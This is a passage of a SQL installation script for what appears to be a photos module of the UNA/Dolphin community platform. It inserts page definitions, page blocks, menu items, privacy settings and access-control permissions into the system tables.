'_bx_photos_page_title_home', 'bx_photos', 2, 2147483647, 1, 'page.php?i=photos-home', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_home', 1, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 1, 1, 0), ('bx_photos_home', 1, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 1, 1, 1), ('bx_photos_home', 2, 'bx_photos', '', '_bx_photos_page_block_title_popular_keywords', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:14:"keywords_cloud";s:6:"params";a:2:{i:0;s:9:"bx_photos";i:1;s:9:"bx_photos";}s:5:"class";s:20:"TemplServiceMetatags";}', 0, 1, 1, 0), ('bx_photos_home', 2, 'bx_photos', '', '_bx_photos_page_block_title_cats', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:15:"categories_list";s:6:"params";a:2:{i:0;s:14:"bx_photos_cats";i:1;a:1:{s:10:"show_empty";b:1;}}s:5:"class";s:20:"TemplServiceCategory";}', 0, 1, 1, 1); -- PAGE: search for entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, 
`cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_search', '_bx_photos_page_title_sys_entries_search', '_bx_photos_page_title_entries_search', 'bx_photos', 5, 2147483647, 1, 'photos-search', 'page.php?i=photos-search', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_form', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:8:"get_form";s:6:"params";a:1:{i:0;a:1:{s:6:"object";s:9:"bx_photos";}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 1, 1), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_results', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:11:"get_results";s:6:"params";a:1:{i:0;a:2:{s:6:"object";s:9:"bx_photos";s:10:"show_empty";b:1;}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 1, 2), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_form_cmts', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:8:"get_form";s:6:"params";a:1:{i:0;a:1:{s:6:"object";s:14:"bx_photos_cmts";}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 0, 3), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_results_cmts', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:11:"get_results";s:6:"params";a:1:{i:0;a:2:{s:6:"object";s:14:"bx_photos_cmts";s:10:"show_empty";b:1;}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 0, 4); -- PAGE: module manage own INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_manage', '_bx_photos_page_title_sys_manage', '_bx_photos_page_title_manage', 'bx_photos', 5, 2147483647, 1, 'photos-manage', 'page.php?i=photos-manage', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_manage', 1, 'bx_photos', '_bx_photos_page_block_title_system_manage', '_bx_photos_page_block_title_manage', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:12:"manage_tools";}}', 0, 1, 0); -- PAGE: module manage all INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_administration', '_bx_photos_page_title_sys_manage_administration', '_bx_photos_page_title_manage', 'bx_photos', 5, 192, 1, 'photos-administration', 'page.php?i=photos-administration', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, 
`visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_administration', 1, 'bx_photos', '_bx_photos_page_block_title_system_manage_administration', '_bx_photos_page_block_title_manage', 11, 192, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:12:"manage_tools";s:6:"params";a:1:{i:0;s:14:"administration";}}', 0, 1, 0); -- PAGE: add block to homepage SET @iBlockOrder = (SELECT `order` FROM `sys_pages_blocks` WHERE `object` = 'sys_home' AND `cell_id` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('sys_home', 1, 'bx_photos', '_bx_photos_page_block_title_recent_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:2:{i:0;b:0;i:1;b:0;}}', 1, 0, 0, IFNULL(@iBlockOrder, 0) + 1); -- PAGES: add page block to profiles modules (trigger* page objects are processed separately upon modules enable/disable) SET @iPBCellProfile = 3; INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('trigger_page_profile_view_entry', @iPBCellProfile, 'bx_photos', '_bx_photos_page_block_title_my_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_author";s:6:"params";a:2:{i:0;s:12:"{profile_id}";i:1;a:2:{s:8:"per_page";s:26:"bx_photos_per_page_profile";s:13:"empty_message";b:0;}}}', 0, 0, 0); -- PAGE: service blocks SET @iBlockOrder = (SELECT `order` FROM `sys_pages_blocks` WHERE `object` = '' AND `cell_id` = 0 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 1), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 2), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_popular_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 3), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_popular_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 4), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 5), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 6), ('', 0, 'bx_photos', 
'_bx_photos_page_block_title_sys_recent_entries_view_showcase', '_bx_photos_page_block_title_recent_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:13:\"browse_public\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 7), ('', 0, 'bx_photos', '_bx_photos_page_block_title_sys_popular_entries_view_showcase', '_bx_photos_page_block_title_popular_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"browse_popular\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 8), ('', 0, 'bx_photos', '_bx_photos_page_block_title_sys_featured_entries_view_showcase', '_bx_photos_page_block_title_featured_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:15:\"browse_featured\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 9); -- MENU: add to site menu SET @iSiteMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_site' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_site', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_home', '_bx_photos_menu_item_title_entries_home', 'page.php?i=photos-home', '', '', 'camera-retro col-blue1', 'bx_photos_submenu', 2147483647, 1, 1, IFNULL(@iSiteMenuOrder, 0) + 1); -- MENU: add to homepage menu SET @iHomepageMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_homepage' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_homepage', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_home', '_bx_photos_menu_item_title_entries_home', 'page.php?i=photos-home', '', '', 'camera-retro col-blue1', 'bx_photos_submenu', 2147483647, 1, 1, IFNULL(@iHomepageMenuOrder, 0) + 1); -- MENU: add to "add content" menu SET @iAddMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_add_content_links' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_add_content_links', 'bx_photos', 'create-photo', '_bx_photos_menu_item_title_system_create_entry', '_bx_photos_menu_item_title_create_entry', 'page.php?i=create-photo', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 1, IFNULL(@iAddMenuOrder, 0) + 1); -- MENU: actions menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view', '_bx_photos_menu_title_view_entry', 'bx_photos_view', 'bx_photos', 9, 0, 1, 'BxPhotosMenuView', 'modules/boonex/photos/classes/BxPhotosMenuView.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, 
`deletable`) VALUES ('bx_photos_view', 'bx_photos', '_bx_photos_menu_set_title_view_entry', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_view', 'bx_photos', 'edit-photo', '_bx_photos_menu_item_title_system_edit_entry', '_bx_photos_menu_item_title_edit_entry', 'page.php?i=edit-photo&id={content_id}', '', '', 'pencil-alt', '', 2147483647, 1, 0, 1), ('bx_photos_view', 'bx_photos', 'delete-photo', '_bx_photos_menu_item_title_system_delete_entry', '_bx_photos_menu_item_title_delete_entry', 'page.php?i=delete-photo&id={content_id}', '', '', 'remove', '', 2147483647, 1, 0, 2); -- MENU: all actions menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_actions', '_sys_menu_title_view_actions', 'bx_photos_view_actions', 'bx_photos', 15, 0, 1, 'BxPhotosMenuViewActions', 'modules/boonex/photos/classes/BxPhotosMenuViewActions.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_view_actions', 'bx_photos', '_sys_menu_set_title_view_actions', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `submenu_popup`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_view_actions', 'bx_photos', 'edit-photo', '_bx_photos_menu_item_title_system_edit_entry', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 10), ('bx_photos_view_actions', 'bx_photos', 'delete-photo', '_bx_photos_menu_item_title_system_delete_entry', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 20), ('bx_photos_view_actions', 'bx_photos', 'comment', '_sys_menu_item_title_system_va_comment', '', '', '', '', '', '', '', 0, 2147483647, 0, 0, 200), ('bx_photos_view_actions', 'bx_photos', 'view', '_sys_menu_item_title_system_va_view', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 210), ('bx_photos_view_actions', 'bx_photos', 'vote', '_sys_menu_item_title_system_va_vote', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 220), ('bx_photos_view_actions', 'bx_photos', 'score', '_sys_menu_item_title_system_va_score', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 230), ('bx_photos_view_actions', 'bx_photos', 'favorite', '_sys_menu_item_title_system_va_favorite', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 240), ('bx_photos_view_actions', 'bx_photos', 'feature', '_sys_menu_item_title_system_va_feature', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 250), ('bx_photos_view_actions', 'bx_photos', 'repost', '_sys_menu_item_title_system_va_repost', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 260), ('bx_photos_view_actions', 'bx_photos', 'report', '_sys_menu_item_title_system_va_report', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 270), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-facebook', '_sys_menu_item_title_system_social_sharing_facebook', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 300), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-googleplus', '_sys_menu_item_title_system_social_sharing_googleplus', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 310), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-twitter', '_sys_menu_item_title_system_social_sharing_twitter', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 320), 
('bx_photos_view_actions', 'bx_photos', 'social-sharing-pinterest', '_sys_menu_item_title_system_social_sharing_pinterest', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 330), ('bx_photos_view_actions', 'bx_photos', 'more-auto', '_sys_menu_item_title_system_va_more_auto', '_sys_menu_item_title_va_more_auto', 'javascript:void(0)', '', '', 'ellipsis-v', '', '', 0, 2147483647, 1, 0, 9999); -- MENU: actions menu for my entries INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_my', '_bx_photos_menu_title_entries_my', 'bx_photos_my', 'bx_photos', 9, 0, 1, 'BxPhotosMenu', 'modules/boonex/photos/classes/BxPhotosMenu.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_my', 'bx_photos', '_bx_photos_menu_set_title_entries_my', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_my', 'bx_photos', 'create-photo', '_bx_photos_menu_item_title_system_create_entry', '_bx_photos_menu_item_title_create_entry', 'page.php?i=create-photo', '', '', 'plus', '', 2147483647, 1, 0, 0); -- MENU: module sub-menu INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_submenu', '_bx_photos_menu_title_submenu', 'bx_photos_submenu', 'bx_photos', 8, 0, 1, '', ''); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_submenu', 'bx_photos', '_bx_photos_menu_set_title_submenu', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_submenu', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_public', '_bx_photos_menu_item_title_entries_public', 'page.php?i=photos-home', '', '', '', '', 2147483647, 1, 1, 1), ('bx_photos_submenu', 'bx_photos', 'photos-popular', '_bx_photos_menu_item_title_system_entries_popular', '_bx_photos_menu_item_title_entries_popular', 'page.php?i=photos-popular', '', '', '', '', 2147483647, 1, 1, 2), ('bx_photos_submenu', 'bx_photos', 'photos-search', '_bx_photos_menu_item_title_system_entries_search', '_bx_photos_menu_item_title_entries_search', 'page.php?i=photos-search', '', '', '', '', 2147483647, 1, 1, 3), ('bx_photos_submenu', 'bx_photos', 'photos-manage', '_bx_photos_menu_item_title_system_entries_manage', '_bx_photos_menu_item_title_entries_manage', 'page.php?i=photos-manage', '', '', '', '', 2147483646, 1, 1, 4); -- MENU: sub-menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_submenu', '_bx_photos_menu_title_view_entry_submenu', 'bx_photos_view_submenu', 'bx_photos', 8, 0, 1, 'BxPhotosMenuView', 'modules/boonex/photos/classes/BxPhotosMenuView.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_view_submenu', 'bx_photos', '_bx_photos_menu_set_title_view_entry_submenu', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, 
`copyable`, `order`) VALUES ('bx_photos_view_submenu', 'bx_photos', 'view-photo', '_bx_photos_menu_item_title_system_view_entry', '_bx_photos_menu_item_title_view_entry_submenu_entry', 'page.php?i=view-photo&id={content_id}', '', '', '', '', 2147483647, 0, 0, 1), ('bx_photos_view_submenu', 'bx_photos', 'view-photo-comments', '_bx_photos_menu_item_title_system_view_entry_comments', '_bx_photos_menu_item_title_view_entry_submenu_comments', 'page.php?i=view-photo-comments&id={content_id}', '', '', '', '', 2147483647, 0, 0, 2); -- MENU: custom menu for snippet meta info INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_snippet_meta', '_sys_menu_title_snippet_meta', 'bx_photos_snippet_meta', 'bx_photos', 15, 0, 1, 'BxPhotosMenuSnippetMeta', 'modules/boonex/photos/classes/BxPhotosMenuSnippetMeta.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_snippet_meta', 'bx_photos', '_sys_menu_set_title_snippet_meta', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `editable`, `order`) VALUES ('bx_photos_snippet_meta', 'bx_photos', 'date', '_sys_menu_item_title_system_sm_date', '_sys_menu_item_title_sm_date', '', '', '', '', '', 2147483647, 0, 0, 1, 1), ('bx_photos_snippet_meta', 'bx_photos', 'rating', '_sys_menu_item_title_system_sm_rating', '_sys_menu_item_title_sm_rating', '', '', '', '', '', 2147483647, 1, 0, 1, 2), ('bx_photos_snippet_meta', 'bx_photos', 'author', '_sys_menu_item_title_system_sm_author', '_sys_menu_item_title_sm_author', '', '', '', '', '', 2147483647, 0, 0, 1, 3), ('bx_photos_snippet_meta', 'bx_photos', 'category', '_sys_menu_item_title_system_sm_category', '_sys_menu_item_title_sm_category', '', '', '', '', '', 2147483647, 0, 0, 1, 4), ('bx_photos_snippet_meta', 'bx_photos', 'tags', '_sys_menu_item_title_system_sm_tags', '_sys_menu_item_title_sm_tags', '', '', '', '', '', 2147483647, 0, 0, 1, 5), ('bx_photos_snippet_meta', 'bx_photos', 'views', '_sys_menu_item_title_system_sm_views', '_sys_menu_item_title_sm_views', '', '', '', '', '', 2147483647, 0, 0, 1, 6), ('bx_photos_snippet_meta', 'bx_photos', 'comments', '_sys_menu_item_title_system_sm_comments', '_sys_menu_item_title_sm_comments', '', '', '', '', '', 2147483647, 1, 0, 1, 7); -- MENU: profile stats SET @iNotifMenuOrder = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_menu_items` WHERE `set_name` = 'sys_profile_stats' AND `active` = 1 LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_profile_stats', 'bx_photos', 'profile-stats-manage-photos', '_bx_photos_menu_item_title_system_manage_my_photos', '_bx_photos_menu_item_title_manage_my_photos', 'page.php?i=photos-manage', '', '_self', 'camera-retro col-blue1', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:41:"get_menu_addon_manage_tools_profile_stats";}', '', 2147483646, 1, 0, @iNotifMenuOrder + 1); -- MENU: manage tools submenu INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_menu_manage_tools', '_bx_photos_menu_title_manage_tools', 'bx_photos_menu_manage_tools', 'bx_photos', 6, 
0, 1, 'BxPhotosMenuManageTools', 'modules/boonex/photos/classes/BxPhotosMenuManageTools.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_menu_manage_tools', 'bx_photos', '_bx_photos_menu_set_title_manage_tools', 0); --INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES --('bx_photos_menu_manage_tools', 'bx_photos', 'delete-with-content', '_bx_photos_menu_item_title_system_delete_with_content', '_bx_photos_menu_item_title_delete_with_content', 'javascript:void(0)', 'javascript:{js_object}.onClickDeleteWithContent({content_id});', '_self', 'far trash-alt', '', 128, 1, 0, 0); -- MENU: dashboard manage tools SET @iManageMenuOrder = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_menu_items` WHERE `set_name`='sys_account_dashboard_manage_tools' LIMIT 1); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_account_dashboard_manage_tools', 'bx_photos', 'photos-administration', '_bx_photos_menu_item_title_system_admt_photos', '_bx_photos_menu_item_title_admt_photos', 'page.php?i=photos-administration', '', '_self', '', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:27:"get_menu_addon_manage_tools";}', '', 192, 1, 0, @iManageMenuOrder + 1); -- MENU: add menu item to profiles modules (trigger* menu sets are processed separately upon modules enable/disable) INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('trigger_profile_view_submenu', 'bx_photos', 'photos-author', '_bx_photos_menu_item_title_system_view_entries_author', '_bx_photos_menu_item_title_view_entries_author', 'page.php?i=photos-author&profile_id={profile_id}', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 0, 0), ('trigger_group_view_submenu', 'bx_photos', 'photos-context', '_bx_photos_menu_item_title_system_view_entries_in_context', '_bx_photos_menu_item_title_view_entries_in_context', 'page.php?i=photos-context&profile_id={profile_id}', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 0, 0); -- PRIVACY INSERT INTO `sys_objects_privacy` (`object`, `module`, `action`, `title`, `default_group`, `table`, `table_field_id`, `table_field_author`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_allow_view_to', 'bx_photos', 'view', '_bx_photos_form_entry_input_allow_view_to', '3', 'bx_photos_entries', 'id', 'author', 'BxPhotosPrivacy', 'modules/boonex/photos/classes/BxPhotosPrivacy.php'); -- ACL INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'create entry', NULL, '_bx_photos_acl_action_create_entry', '', 1, 3); SET @iIdActionEntryCreate = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'delete entry', NULL, '_bx_photos_acl_action_delete_entry', '', 1, 3); SET @iIdActionEntryDelete = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'view entry', NULL, '_bx_photos_acl_action_view_entry', '', 1, 0); SET 
@iIdActionEntryView = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'set thumb', NULL, '_bx_photos_acl_action_set_thumb', '', 1, 3); SET @iIdActionSetThumb = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'edit any entry', NULL, '_bx_photos_acl_action_edit_any_entry', '', 1, 3); SET @iIdActionEntryEditAny = LAST_INSERT_ID(); SET @iUnauthenticated = 1; SET @iAccount = 2; SET @iStandard = 3; SET @iUnconfirmed = 4; SET @iPending = 5; SET @iSuspended = 6; SET @iModerator = 7; SET @iAdministrator = 8; SET @iPremium = 9; INSERT INTO `sys_acl_matrix` (`IDLevel`, `IDAction`) VALUES -- entry create (@iStandard, @iIdActionEntryCreate), (@iModerator, @iIdActionEntryCreate), (@iAdministrator, @iIdActionEntryCreate), (@iPremium, @iIdActionEntryCreate), -- entry delete (@iStandard, @iIdActionEntryDelete), (@iModerator, @iIdActionEntryDelete), (@iAdministrator, @iIdActionEntryDelete), (@iPremium, @iIdActionEntryDelete), -- entry view (@iUnauthenticated, @iIdActionEntryView), (@iAccount, @iIdActionEntryView), (@iStandard, @iIdActionEntryView), (@iUnconfirmed, @iIdActionEntryView), (@iPending, @iIdActionEntryView), (@iModerator, @iIdActionEntryView), (@iAdministrator, @iIdActionEntryView), (@iPremium, @iIdActionEntryView), -- set entry thumb (@iStandard, @iIdActionSetThumb), (@iModerator, @iIdActionSetThumb), (@iAdministrator, @iIdActionSetThumb), (@iPremium, @iIdActionSetThumb), -- edit any entry (@iModerator, @iIdActionEntryEditAny), (@iAdministrator, @iIdActionEntryEditAny); -- SEARCH SET @iSearchOrder = (SELECT IFNULL(MAX(`Order`), 0) FROM `sys_objects_search`); INSERT INTO `sys_objects_search` (`ObjectName`, `Title`, `Order`, `ClassName`, `ClassPath`) VALUES ('bx_photos', 